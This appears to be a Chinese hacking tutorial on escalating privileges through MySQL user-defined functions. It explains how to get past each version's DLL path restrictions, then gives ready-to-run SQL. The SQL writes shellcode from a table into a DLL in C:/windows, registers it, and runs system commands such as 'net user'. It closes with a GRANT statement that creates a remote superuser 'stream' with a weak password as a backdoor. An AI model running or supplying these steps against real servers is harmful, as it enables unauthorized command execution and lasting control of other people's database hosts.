mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能。
但是对于UDF的具体限制,MYSQL的各个版本各有不同。 下面详细说明一下:
MYSQL 4.1以前的版本中,可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。
无论这个DLL在什么位置,函数的声明是什么样的。
MYSQL 4.1及以后的版本中,对UDF函数进行了限制,只有实现了一个特定接口的函数才可以被成功注册到MYSQL中。
而后续版本又逐步加强了控制,以往的操作会遇到 以下错误:
1124 - No paths allowed for shared library
因为在mysql5之后不能用绝对路径
5.0及以后的版本,要上传到系统目录或PATH这个环境变量所表示的任何一个目录
5.1及以后的版本,要上传到mysql安装目录下的lib/plugin目录
MYSQL5以后,对注册的DLL的位置有了限制,创建函数的时候,所对应的DLL不能包含/或者\,简单的理解就是不能是绝对路径。所以我们将DLL释放到system32目录,来跳过这个限制。。或者放到盘符的根目录下通过c:udf.dll这种形式的写法来跳过限制。
只要把dll放到PATH这个环境变量所表示的任何一个目录下面,效果跟放到system32目录下面一样。
1126 - Can't open shared library 'udf.dll'
这是因为MYSQL 5.1及以后的版本中,又多了一个限制。
创建函数时所用的DLL只能放在mysql的plugin目录里面
而且这个plugin目录默认是不存在的
那么自己在mysql安装目录下建lib/plugin 文件夹,把udf.dll导到这里就行
这里又有个技巧,显示mysql的安装路径 SHOW VARIABLES LIKE '%plugin%';
PS :
UDF使用(建表,这个表有个装二进制内容的字段,把udf.dll的内容二进制写到表中,导出DLL,建立方法,调用方法)
有的人问怎么在没shell的情况下提权,如果你知道上面这些,也就是UDF流程,那么我想你应该懂了。
以下是引用片段:
CREATE TABLE stream_udf (shellcode BLOB);
INSERT into stream_udf values (CONVERT(传说中的shellcode,因为太长,要的去赣友网下,CHAR));
SELECT shellcode FROM stream_udf INTO DUMPFILE ’C:/windows/streamudf.dll’;
Create Function state returns string soname ’streamudf.dll’;
select state(’net user’);
DROP TABLE stream_udf;
加用户的语句
以下是引用片段:
GRANT ALL PRIVILEGES ON *.* TO’stream’@’%’IDENTIFIED BY ’123456’ WITH GRANT OPTION;